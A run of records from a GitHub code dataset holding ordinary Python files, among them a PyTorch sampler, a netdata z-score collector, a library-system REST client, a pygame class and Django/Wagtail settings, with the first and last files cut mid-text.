time.sleep(2)\n print(math.factorial(param))\n\n@zamanHesap\ndef ConCat(*args):\n sonuc = \"\"\n for item in args:\n sonuc += \";\" + item\n print(sonuc)\n\n@zamanHesap\ndef JoinBir(*args):\n sonuc = \"\"\n sonuc = \";\".join(args)\n print(sonuc)\n\nJoinBir(\"ali\",\"veli\",\"ayşe\")\nConCat(\"ali\",\"veli\",\"ayşe\")","repo_name":"VektorelPythonHIA23/pythontemel","sub_path":"OOP/Decaorators.py","file_name":"Decaorators.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27260532224","text":"import json\nimport logging\nimport numpy as np\nimport os\nimport random\nimport string\nimport torch\n\n\nclass SizeAwareSampler(torch.utils.data.Sampler):\n \"\"\"Returns a batch with the specified total length.\n\n from David Gaddy's\n https://github.com/dgaddy/silent_speech/blob/main/read_emg.py\n \"\"\"\n def __init__(self, audio_lens, max_len=2000):\n self.audio_lens = audio_lens\n self.max_len = max_len\n\n def __iter__(self):\n indices = list(range(len(self.audio_lens)))\n random.shuffle(indices)\n batch = []\n batch_length = 0\n for idx in indices:\n length = self.audio_lens[idx]\n if length > self.max_len:\n logging.warning(f'Warning: example {idx} cannot fit within desired batch length')\n if length + batch_length > self.max_len:\n yield batch\n batch = []\n batch_length = 0\n batch.append(idx)\n batch_length += length\n # dropping last incomplete batch\n","repo_name":"articulatory/articulatory","sub_path":"articulatory/samplers/pytorch_samplers.py","file_name":"pytorch_samplers.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"83"} +{"seq_id":"19323038774","text":"\nimport PySimpleGUI as sg\n\nsg.theme('DarkAmber') # デザインテーマの設定\n\n# ウィンドウに配置するコンポーネント\nlayout = [\n [sg.Text(' config.cfg path', size=(15, 2))],\n [sg.FileBrowse(' ファイルを選択 ', key='inputFilePath')],\n [sg.InputText(size=(19, 1))],\n [sg.Text(' 縦幅 (Height)')],\n [sg.InputText(size=(19, 1))],\n [sg.Text(' 横幅 (Width) ')], \n [sg.InputText(size=(19,1))],\n [sg.Button(' change '), sg.Button(' cancel ')] ]\n\n# ウィンドウの生成\nwindow = sg.Window('osu! resolution changer', layout)\n\n# イベントループ\nwhile True:\n event, values = window.read()\n if event == sg.WIN_CLOSED or event == ' cancel ':\n break\n elif event == ' change ':\n with open(values['inputFilePath'], encoding='shift_jis') as f:\n l = f.readlines()\n l[89] = \"Height = \" + values[1] + \"\\n\"\n l[90] = \"Width = \" + values[2] + \"\\n\" \n with open(values['inputFilePath'], 'w') as f:\n for d in l:\n f.write(d) \n break \n\n\nwindow.close()\n\n\n\n\n\n","repo_name":"sea-mods/python","sub_path":"guirennsyuu.py","file_name":"guirennsyuu.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"38752768895","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport pickle\n\nimport os\nimport sys\n\nfile_path = os.path.abspath(__file__)\nproject_dir = os.path.join(file_path.split('ALModel_dev')[0], 'ALModel_dev')\n\nsensitivity_analysis_dir = os.path.join(project_dir, 'sensitivity_analysis')\nsaved_sims_dir = os.path.join(sensitivity_analysis_dir, 'save_sims_sensitivity_sweep')\n\n## map simulation time tags to run condition\n\nbase_timetag = {'2022_11_9-11_33_0': 'base'}\n\nd_0p25_timetags = {\n\t'2022_11_9-11_34_16': 'ORN x3/4',\n\t'2022_11_9-11_34_28': 'eLN x3/4',\n\t'2022_11_9-11_35_9': 'iLN x3/4',\n\t'2022_11_9-11_35_16': 'PN x3/4',\n\n\t'2022_11_10-12_24_10': 'ORN x4/3',\n\t'2022_11_9-14_20_45': 'eLN x4/3',\n\t'2022_11_10-12_24_24': 'iLN x4/3',\n\t'2022_11_9-15_51_49': 'PN x4/3',\n}\n\nd_0p5_timetags = {\n\t'2022_11_10-17_17_4': 'ORN x1/2',\n\t'2022_11_10-17_17_35': 'eLN x1/2',\n\t'2022_11_10-17_17_41': 'iLN x1/2',\n\t'2022_11_10-17_17_50': 'PN x1/2',\n\n\t'2022_11_10-17_18_14': 'ORN x2',\n\t'2022_11_10-17_18_20': 'eLN x2',\n\t'2022_11_10-17_18_43': 'iLN x2',\n\t'2022_11_10-17_18_50': 'PN x2',\n}\n\nd_0p75_timetags = {\n\t'2022_11_10-17_24_27': 'ORN x1/4',\n\t'2022_11_10-17_24_34': 'eLN x1/4',\n\t'2022_11_11-9_42_0': 'iLN x1/4',\n\t'2022_11_11-10_31_7': 'PN x1/4',\n\n\t'2022_11_10-17_24_58': 'ORN x4',\n\t'2022_11_10-17_26_55': 'eLN x4',\n\t'2022_11_10-17_27_23': 'iLN x4',\n\t'2022_11_10-17_27_30': 'PN x4',\n}\n\ntimetag_sets = [base_timetag, d_0p25_timetags, d_0p5_timetags, d_0p75_timetags]\ntimetag_set_paths_local = ['sensitivity_base',\n\t\t\t\t\t 'sensitivity_0p25/single_param', \n\t\t\t\t\t 'sensitivity_0p5/single_param', \n\t\t\t\t\t 'sensitivity_0p75/single_param'] \ntimetag_set_paths_abs = [os.path.join(saved_sims_dir, d) for d in timetag_set_paths_local]\n\n\nn_sets = len(timetag_sets)\n\nfor iis in range(n_sets):\n\n\tcur_timetag_set = timetag_sets[iis]\n\tcur_timetag_local = timetag_set_paths_local[iis]\n\tcur_timetag_path = timetag_set_paths_abs[iis]\n\n\tprint('processing {}...'.format(cur_timetag_local))\n\n\tsim_dir_path = os.path.join(saved_sims_dir, cur_timetag_local)\n\n\tsim_dirs = os.listdir(sim_dir_path)\n\n\trun_timetags = list(cur_timetag_set.keys())\n\trun_names = list(cur_timetag_set.values())\n\n\tn_runs = len(run_timetags)\n\n\td_sensitivity_res = {}\n\tfor ir in range(n_runs):\n\t\tcur_timetag = run_timetags[ir]\n\t\tcur_name = run_names[ir]\n\n\t\trun_dir_local = [d for d in sim_dirs if cur_timetag in d][0]\n\t\trun_dir_abs = os.path.join(sim_dir_path, run_dir_local)\n\n\t\trun_dir_files = [os.path.join(run_dir_abs, f) for f in os.listdir(run_dir_abs)]\n\t\trun_df_AL_activity_f = [f for f in run_dir_files if 'df_AL_activity' in f][0]\n\t\trun_df_AL_activity = pd.read_csv(run_df_AL_activity_f)\n\n\t\td_sensitivity_res[cur_name] = run_df_AL_activity\n\n\tres_file = os.path.join(sensitivity_analysis_dir, 'analysis/',\n\t\t\t\t\t\t\tcur_timetag_local.replace('/', '')+'_df_AL_activitys.p')\n\tpickle.dump(d_sensitivity_res, open(res_file, 'wb'))","repo_name":"dlavrent/ALVariability","sub_path":"sensitivity_analysis/analyze_sensitivity_sweep.py","file_name":"analyze_sensitivity_sweep.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"70406278993","text":"# -*- coding: utf-8 -*-\n# Description: zscores netdata python.d module\n# Author: andrewm4894\n# SPDX-License-Identifier: GPL-3.0-or-later\n\nfrom datetime import datetime\nimport re\n\nimport requests\nimport numpy as np\nimport pandas as pd\n\nfrom bases.FrameworkServices.SimpleService import SimpleService\nfrom netdata_pandas.data import get_data, get_allmetrics\n\npriority = 60000\nupdate_every = 5\ndisabled_by_default = True\n\nORDER = [\n 'z',\n '3stddev'\n]\n\nCHARTS = {\n 'z': {\n 'options': ['z', 'Z Score', 'z', 'Z Score', 'zscores.z', 'line'],\n 'lines': []\n },\n '3stddev': {\n 'options': ['3stddev', 'Z Score >3', 'count', '3 Stddev', 'zscores.3stddev', 'stacked'],\n 'lines': []\n },\n}\n\n\nclass Service(SimpleService):\n def __init__(self, configuration=None, name=None):\n SimpleService.__init__(self, configuration=configuration, name=name)\n self.host = self.configuration.get('host', '127.0.0.1:19999')\n self.charts_regex = re.compile(self.configuration.get('charts_regex', 'system.*'))\n self.charts_to_exclude = self.configuration.get('charts_to_exclude', '').split(',')\n self.charts_in_scope = [\n c for c in\n list(filter(self.charts_regex.match,\n requests.get(f'http://{self.host}/api/v1/charts').json()['charts'].keys()))\n if c not in self.charts_to_exclude\n ]\n self.train_secs = self.configuration.get('train_secs', 14400)\n self.offset_secs = self.configuration.get('offset_secs', 300)\n self.train_every_n = self.configuration.get('train_every_n', 900)\n self.z_smooth_n = self.configuration.get('z_smooth_n', 15)\n self.z_clip = self.configuration.get('z_clip', 10)\n self.z_abs = bool(self.configuration.get('z_abs', True))\n self.burn_in = self.configuration.get('burn_in', 2)\n self.mode = self.configuration.get('mode', 'per_chart')\n self.per_chart_agg = self.configuration.get('per_chart_agg', 'mean')\n self.order = ORDER\n self.definitions = CHARTS\n self.collected_dims = {'z': set(), '3stddev': set()}\n self.df_mean = pd.DataFrame()\n self.df_std = pd.DataFrame()\n self.df_z_history = pd.DataFrame()\n\n def check(self):\n _ = get_allmetrics(self.host, self.charts_in_scope, wide=True, col_sep='.')\n return True\n\n def validate_charts(self, chart, data, algorithm='absolute', multiplier=1, divisor=1):\n \"\"\"If dimension not in chart then add it.\n \"\"\"\n for dim in data:\n if dim not in self.collected_dims[chart]:\n self.collected_dims[chart].add(dim)\n self.charts[chart].add_dimension([dim, dim, algorithm, multiplier, divisor])\n\n for dim in list(self.collected_dims[chart]):\n if dim not in data:\n self.collected_dims[chart].remove(dim)\n self.charts[chart].del_dimension(dim, hide=False)\n\n def train_model(self):\n \"\"\"Calculate the mean and stddev for all relevant metrics and store them for use in calulcating zscore at each timestep.\n \"\"\"\n before = int(datetime.now().timestamp()) - self.offset_secs\n after = before - self.train_secs\n\n self.df_mean = get_data(\n self.host, self.charts_in_scope, after, before, points=10, group='average', col_sep='.'\n ).mean().to_frame().rename(columns={0: \"mean\"})\n\n self.df_std = get_data(\n self.host, self.charts_in_scope, after, before, points=10, group='stddev', col_sep='.'\n ).mean().to_frame().rename(columns={0: \"std\"})\n\n def create_data(self, df_allmetrics):\n \"\"\"Use x, mean, stddev to generate z scores and 3stddev flags via some pandas manipulation.\n Returning two dictionaries of dimensions and measures, one for each chart.\n\n :param df_allmetrics : pandas dataframe with latest data from api/v1/allmetrics.\n :return: (,) tuple of dictionaries, one for zscores and the other for a flag if abs(z)>3.\n \"\"\"\n # calculate clipped z score for each available metric\n df_z = pd.concat([self.df_mean, self.df_std, df_allmetrics], axis=1, join='inner')\n df_z['z'] = ((df_z['value'] - df_z['mean']) / df_z['std']).clip(-self.z_clip, self.z_clip).fillna(0) * 100\n if self.z_abs:\n df_z['z'] = df_z['z'].abs()\n\n # append last z_smooth_n rows of zscores to history table in wide format\n self.df_z_history = self.df_z_history.append(\n df_z[['z']].reset_index().pivot_table(values='z', columns='index'), sort=True\n ).tail(self.z_smooth_n)\n\n # get average zscore for last z_smooth_n for each metric\n df_z_smooth = self.df_z_history.melt(value_name='z').groupby('index')['z'].mean().to_frame()\n df_z_smooth['3stddev'] = np.where(abs(df_z_smooth['z']) > 300, 1, 0)\n data_z = df_z_smooth['z'].add_suffix('_z').to_dict()\n\n # aggregate to chart level if specified\n if self.mode == 'per_chart':\n df_z_smooth['chart'] = ['.'.join(x[0:2]) + '_z' for x in df_z_smooth.index.str.split('.').to_list()]\n if self.per_chart_agg == 'absmax':\n data_z = \\\n list(df_z_smooth.groupby('chart').agg({'z': lambda x: max(x, key=abs)})['z'].to_dict().values())[0]\n else:\n data_z = list(df_z_smooth.groupby('chart').agg({'z': [self.per_chart_agg]})['z'].to_dict().values())[0]\n\n data_3stddev = {}\n for k in data_z:\n data_3stddev[k.replace('_z', '')] = 1 if abs(data_z[k]) > 300 else 0\n\n return data_z, data_3stddev\n\n def get_data(self):\n\n if self.runs_counter <= self.burn_in or self.runs_counter % self.train_every_n == 0:\n self.train_model()\n\n data_z, data_3stddev = self.create_data(\n get_allmetrics(self.host, self.charts_in_scope, wide=True, col_sep='.').transpose())\n data = {**data_z, **data_3stddev}\n\n self.validate_charts('z', data_z, divisor=100)\n self.validate_charts('3stddev', data_3stddev)\n\n return data\n","repo_name":"netdata/netdata","sub_path":"collectors/python.d.plugin/zscores/zscores.chart.py","file_name":"zscores.chart.py","file_ext":"py","file_size_in_byte":6126,"program_lang":"python","lang":"en","doc_type":"code","stars":66015,"dataset":"github-code","pt":"83"} +{"seq_id":"39379205335","text":"# @Author: lym12321\r\n# @Date: 2022-08-29\r\n\r\nfrom requests import session\r\nimport json\r\n\r\nrequests = session() # 这样可以存 cookie,用法与 requests 相同\r\n\r\nbaseUrl = '' # 服务器 api 地址\r\n\r\nheaders = {'Content-Type' : 'application/json'}\r\n\r\n# 固定的接口返回格式\r\ndef ret(code, msg):\r\n return {'code': code, 'msg': msg}\r\n\r\n# 登入系统\r\n# username: 用户名\r\n# password: 密码\r\ndef login(username, password):\r\n data = {\r\n 'strUserName': username,\r\n 'strPassword': password,\r\n 'strParameters': 'type=worker,client=REST|0.01'\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/login', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['LoginResult']['ErrorCode'] != 0:\r\n return ret(j['LoginResult']['ErrorCode'], j['LoginResult']['ErrorInfo'])\r\n return ret(0, j)\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# 登出系统\r\ndef logout(): \r\n try:\r\n r = requests.post(f'{baseUrl}/logout')\r\n return ret(0, json.loads(r.text))\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# 获取读者信息\r\n# barcode: 读者证条码号\r\n# retType: 返回信息格式\r\ndef getReaderInfo(barcode, retType):\r\n data = {\r\n 'strBarcode': barcode,\r\n 'strResultTypeList': retType\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/getReaderInfo', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['GetReaderInfoResult']['ErrorCode'] != 0:\r\n return ret(j['GetReaderInfoResult']['ErrorCode'], j['GetReaderInfoResult']['ErrorInfo'])\r\n return ret(0, j['results'][0])\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# 获取书籍摘要\r\ndef getBiblioSummary(barcode):\r\n data = {\r\n 'strItemBarcode': barcode\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/getBiblioSummary', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['GetBiblioSummaryResult']['ErrorCode'] != 0:\r\n return ret(j['GetBiblioSummaryResult']['ErrorCode'], j['GetBiblioSummaryResult']['ErrorInfo'])\r\n return ret(0, j)\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# 获取书籍详细信息\r\n# retType: xml/html/@price/@accessno\r\ndef getBiblioInfo(recPath, retType):\r\n data = {\r\n 'strBiblioRecPath': recPath,\r\n 'strBiblioType': retType\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/getBiblioInfo', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['GetBiblioInfoResult']['ErrorCode'] != 0:\r\n return ret(j['GetBiblioInfoResult']['ErrorCode'], j['GetBiblioInfoResult']['ErrorInfo'])\r\n return ret(0, j['strBiblio'])\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# 借书或续借\r\n# reader: 读者证条码号\r\n# barcode: 书籍册条码号\r\n# 若 cont = True,则为续借操作\r\ndef Borrow(reader, barcode, cont = False):\r\n data = {\r\n 'bRenew': cont,\r\n 'strReaderBarcode': reader,\r\n 'strItemBarcode': barcode,\r\n 'bForce': False\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/Borrow', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['BorrowResult']['ErrorCode'] != 0:\r\n return ret(j['BorrowResult']['ErrorCode'], j['BorrowResult']['ErrorInfo'])\r\n return ret(0, j)\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# 还书\r\n# barcode: 书籍条码号\r\ndef Return(barcode):\r\n data = {\r\n 'strAction': 'return',\r\n 'strItemBarcode': barcode\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/Return', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['ReturnResult']['ErrorCode'] != 0:\r\n return ret(j['ReturnResult']['ErrorCode'], j['ReturnResult']['ErrorInfo'])\r\n return ret(0, j)\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# 检索读者记录,保存到结果集(默认为 default)\r\n# keyword: 检索词\r\n# matchStyle: 匹配方式(left/middle/right/exact)\r\n# matchFrom: 检索途径(/证条码号/姓名/...)\r\n# @return: 命中条数\r\ndef searchReader(keyword, matchStyle = 'middle', matchFrom = '', resultSetName = 'default'):\r\n data = {\r\n 'strReaderDbNames': '',\r\n 'strQueryWord': keyword,\r\n 'nPerMax': -1,\r\n 'strFrom': matchFrom,\r\n 'strMatchStyle': matchStyle,\r\n 'strResultSetName': resultSetName\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/searchReader', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['SearchReaderResult']['ErrorCode'] != 0:\r\n return ret(j['SearchReaderResult']['ErrorCode'], j['SearchReaderResult']['ErrorInfo'])\r\n return ret(0, j['SearchReaderResult']['Value'])\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# 检索书目\r\n# keyword: 检索词\r\n# matchStyle: 匹配方式(left/middle/right/exact)\r\n# matchFrom: 检索途径(/ISBN/题名/...)\r\n# @return: 命中条数\r\ndef searchBiblio(keyword, matchStyle = 'middle', matchFrom = '', resultSetName = 'default'):\r\n data = {\r\n 'strBiblioDbNames': '',\r\n 'strQueryWord': keyword,\r\n 'nPerMax': -1,\r\n 'strFromStyle': matchFrom,\r\n 'strMatchStyle': matchStyle,\r\n 'strResultSetName': resultSetName\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/searchBiblio', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['SearchBiblioResult']['ErrorCode'] != 0:\r\n return ret(j['SearchBiblioResult']['ErrorCode'], j['SearchBiblioResult']['ErrorInfo'])\r\n return ret(0, j['SearchBiblioResult']['Value'])\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# 从结果集中指定起点获取指定数量的检索结果\r\n# start: 记录起点,从 0 开始\r\n# count: 记录数量,当 count = -1 时,获取尽可能多的结果\r\n# 对于读者库来说,@return: [{'Cols': [证条码号, 姓名, 状态, 读者类别, 单位, 身份证号, 证号, 失效期]}]\r\n# 对于书库来说,@return: [{'Cols': [路径, 题名, 作者, 出版社, 出版时间, 中图法分类号, 主题词, 关键词, ISBN]}]\r\ndef getSearchResult(start, count, resultSetName = 'default'):\r\n data = {\r\n 'strResultSetName': resultSetName,\r\n 'lStart': start,\r\n 'lCount': count,\r\n 'strBrowseInfoStyle': 'id,cols'\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/getSearchResult', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['GetSearchResultResult']['ErrorCode'] != 0:\r\n return ret(j['GetSearchResultResult']['ErrorCode'], j['GetSearchResultResult']['ErrorInfo'])\r\n return ret(0, {'count': j['GetSearchResultResult']['Value'], 'results': j['searchresults']})\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# 获得同一书目记录下的若干册记录信息\r\n# recPath: 书目路径\r\n# start: 查询起点,从 0 开始\r\n# count: 查询数量,当 count = -1 时,获取尽可能多的结果\r\ndef getEntities(recPath, start, count):\r\n data = {\r\n 'strBiblioRecPath': recPath,\r\n 'lStart': start,\r\n 'lCount': count,\r\n 'strStyle': 'onlygetpath'\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/getEntities', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['GetEntitiesResult']['ErrorCode'] != 0:\r\n return ret(j['GetEntitiesResult']['ErrorCode'], j['GetEntitiesResult']['ErrorInfo'])\r\n return ret(0, {'count': j['GetEntitiesResult']['Value'], 'results': j['entityinfos']})\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# 获得实体记录信息\r\n# barcode: 实体条码\r\n# retType: 返回类型\r\ndef getItemInfo(barcode, retType):\r\n data = {\r\n 'strBarcode': barcode,\r\n 'strResultType': retType\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/getItemInfo', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['GetItemInfoResult']['ErrorCode'] != 0:\r\n return ret(j['GetItemInfoResult']['ErrorCode'], j['GetItemInfoResult']['ErrorInfo'])\r\n # return ret(0, {'count': j['GetItemInfoResult']['Value'], 'results': j['entityinfos']})\r\n return ret(0, j['strResult'])\r\n except Exception as e:\r\n return ret(-1, e)\r\n","repo_name":"lym12321/dp2-API","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":8486,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"23431201551","text":"import pygame\nfrom model.event_box import EventBox\nimport pygame\n\n\nclass Door(EventBox):\n \"\"\"\n Porte qui permet de passer au niveau suivant.\n Se déclanche lorsque le joueur est entré en collision avec.\n\n Paramètres:\n - scene: scene où se trouve la porte\n - x, y: position de la porte\n - groups: tuple groupe auquel de la porte appartient\n \"\"\"\n\n def __init__(self, scene, x, y, groups):\n self.scene = scene\n\n self.image_closed = pygame.image.load(\n \"assets/door-closed.png\").convert_alpha()\n self.image_open = pygame.image.load(\n \"assets/door-open.png\").convert_alpha()\n self.locked = True\n\n self.open_sound = pygame.mixer.Sound(\n \"assets/sounds/door/door_lock_open_01.wav\")\n\n super().__init__(x, y, \"assets/door-closed.png\",\n (self.scene.player_group, self.scene.enemy_group), groups)\n\n def on_collision(self, entity):\n \"\"\"\n Est appelé lorsque un joueur est entré en collision avec la porte\n\n Propriétés:\n - entity: entité qui est entré en colision\n \"\"\"\n super().on_collision(entity)\n if self.locked == False:\n self.scene.next_level()\n self.set_locked(True)\n\n def set_locked(self, state: bool):\n \"\"\"\n Definie si la porte est verouillé ou non et actualise la vue\n \"\"\"\n if self.locked == state:\n return\n else:\n self.locked = state\n if self.locked:\n self.image = self.image_closed\n else:\n self.image = self.image_open\n self.open_sound.play()\n","repo_name":"olimarmite/shoot-clash","sub_path":"src/door.py","file_name":"door.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"1111268098","text":"\"\"\"\nDjango settings for '{{ cookiecutter.project_name }}' project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/4.1/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/4.1/ref/settings/\n\"\"\"\n\nimport environ\nimport os\nfrom django.utils.translation import gettext_lazy as _\nfrom email.utils import getaddresses\nfrom io import StringIO\nfrom urllib.parse import urlparse\n\nBASE_DIR = environ.Path(__file__) - 2\nPROJECT_DIR = environ.Path(__file__) - 1\n\n# read enviroment variables\nenv = environ.Env()\nif os.path.isfile(BASE_DIR(\".env\")):\n env.read_env(BASE_DIR(\".env\"))\n\n# read .env from enviroment variable\nENV_FILE = env(\"ENV_FILE\", default=None)\nif ENV_FILE:\n env.read_env(StringIO(ENV_FILE))\n\n# environment settings\nENVIRONMENT = env(\"ENVIRONMENT\", default=\"develop\")\nDEBUG = env.bool(\"DEBUG\", default=True)\n\n# Site URL to use when referring to full URLs within the Wagtail admin backend -\n# e.g. in notification emails. Don't include '/admin' or a trailing slash\nVIRTUAL_HOST = env.str(\"VIRTUAL_HOST\", default=\"localhost\")\n\n# secuirty settings\nSECRET_KEY = env.str(\"SECRET_KEY\", default=\"dummy\")\nINTERNAL_IPS = env.bool(\"INTERNAL_IPS\", default=[\"127.0.0.1\"])\nUSE_X_FORWARDED_HOST = True\nX_FRAME_OPTIONS = \"SAMEORIGIN\"\nALLOWED_HOSTS = env.list(\"ALLOWED_HOSTS\", default=[VIRTUAL_HOST])\nCSRF_TRUSTED_ORIGINS = env.list(\n \"CSRF_TRUSTED_ORIGINS\", default=[f\"https://{VIRTUAL_HOST}\"]\n)\nSECURE_PROXY_SSL_HEADER = (\"HTTP_X_FORWARDED_PROTO\", \"https\")\n\n# Application definition\nINSTALLED_APPS = [\n # This project\n \"website\",\n # Wagtail CRX (CodeRed Extensions)\n \"coderedcms\",\n \"django_bootstrap5\",\n \"modelcluster\",\n \"taggit\",\n \"wagtailcache\",\n \"wagtailseo\",\n # Wagtail\n \"wagtail.contrib.forms\",\n \"wagtail.contrib.redirects\",\n \"wagtail.embeds\",\n \"wagtail.sites\",\n \"wagtail.users\",\n \"wagtail.snippets\",\n \"wagtail.documents\",\n \"wagtail.images\",\n \"wagtail.search\",\n \"wagtail\",\n \"wagtail.contrib.settings\",\n \"wagtail.contrib.modeladmin\",\n \"wagtail.contrib.table_block\",\n \"wagtail.admin\",\n # Django\n \"django.contrib.admin\",\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"whitenoise.runserver_nostatic\",\n \"django.contrib.staticfiles\",\n \"django.contrib.sitemaps\",\n # aditional apps\n \"storages\",\n \"sass_processor\",\n]\n\nMIDDLEWARE = [\n # Save pages to cache. Must be FIRST.\n \"wagtailcache.cache.UpdateCacheMiddleware\",\n # Common functionality\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n # Security\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n \"django.middleware.security.SecurityMiddleware\",\n \"whitenoise.middleware.WhiteNoiseMiddleware\",\n # Error reporting. Uncomment this to receive emails when a 404 is triggered.\n # 'django.middleware.common.BrokenLinkEmailsMiddleware',\n # CMS functionality\n \"wagtail.contrib.redirects.middleware.RedirectMiddleware\",\n # Fetch from cache. Must be LAST.\n \"wagtailcache.cache.FetchFromCacheMiddleware\",\n]\n\nROOT_URLCONF = \"{{ cookiecutter.project_slug }}.urls\"\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n \"wagtail.contrib.settings.context_processors.settings\",\n ],\n },\n },\n]\n\nWSGI_APPLICATION = \"{{ cookiecutter.project_slug }}.wsgi.application\"\n\n\n# Database\n# https://docs.djangoproject.com/en/4.1/ref/settings/#databases\nDATABASE_URL = env(\"DATABASE_URL\", default=\"sqlite:///db.sqlite3\")\nDATABASES = {\"default\": env.db(default=\"sqlite:///db.sqlite3\")}\n\n# cache config\nCACHES = {\"default\": env.cache(default=\"locmemcache://\")}\n\n# Password validation\n# https://docs.djangoproject.com/en/4.1/ref/settings/#auth-password-validators\nAUTH_PASSWORD_VALIDATORS = [\n {\n \"NAME\": \"django.contrib.auth.password_validation.UserAttributeSimilarityValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.MinimumLengthValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.CommonPasswordValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.NumericPasswordValidator\",\n },\n]\n\n# Internationalization\n# https://docs.djangoproject.com/en/4.1/topics/i18n/\nLANGUAGE_CODE = \"pt-br\"\nLANGUAGES = [(\"pt-br\", _(\"Potuguês Brasil\"))]\nTIME_ZONE = env(\"TIME_ZONE\", default=\"America/Recife\")\nUSE_I18N = True\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/4.1/howto/static-files/\n\nSTATICFILES_FINDERS = [\n \"django.contrib.staticfiles.finders.FileSystemFinder\",\n \"django.contrib.staticfiles.finders.AppDirectoriesFinder\",\n \"sass_processor.finders.CssFinder\",\n]\nSTATIC_ROOT = env(\"STATIC_ROOT\", default=BASE_DIR(\"staticfiles\"))\nSTATIC_URL = env(\"STATIC_URL\", default=\"/static/\")\nWHITENOISE_KEEP_ONLY_HASHED_FILES = True\nif not DEBUG:\n STATICFILES_STORAGE = \"whitenoise.storage.Compressed{% if cookiecutter.whitenoise_static %}Manifest{% endif %}StaticFilesStorage\"\n\nSASS_PROCESSOR_AUTO_INCLUDE = True\nSASS_OUTPUT_STYLE = \"compact\"\n\n# Media files\nMEDIA_ROOT = env(\"MEDIA_ROOT\", default=BASE_DIR(\"media\"))\nMEDIA_URL = env(\"MEDIA_URL\", default=\"/media/\")\nDATA_UPLOAD_MAX_MEMORY_SIZE = 20 * 1024**2 # max upload data 20 MB\nFILE_UPLOAD_DIRECTORY_PERMISSIONS = 0o755\nFILE_UPLOAD_PERMISSIONS = 0o644\n\n# Email config\nADMINS = getaddresses([env(\"ADMINS\", default=\"\")])\nMANAGERS = ADMINS\nDEFAULT_FROM_EMAIL = env(\"DEFAULT_FROM_EMAIL\", default=None)\nSERVER_EMAIL = env(\"SERVER_EMAIL\", default=DEFAULT_FROM_EMAIL)\nvars().update(env.email_url(\"EMAIL_URL\", default=\"consolemail://\"))\n\n# Login\nLOGIN_URL = \"wagtailadmin_login\"\nLOGIN_REDIRECT_URL = \"wagtailadmin_home\"\n\n# Wagtail settings\nWAGTAIL_SITE_NAME = \"{{ cookiecutter.project_name }}\"\nWAGTAIL_ENABLE_UPDATE_CHECK = False\nWAGTAILSEARCH_BACKENDS = {\"default\": {\"BACKEND\": 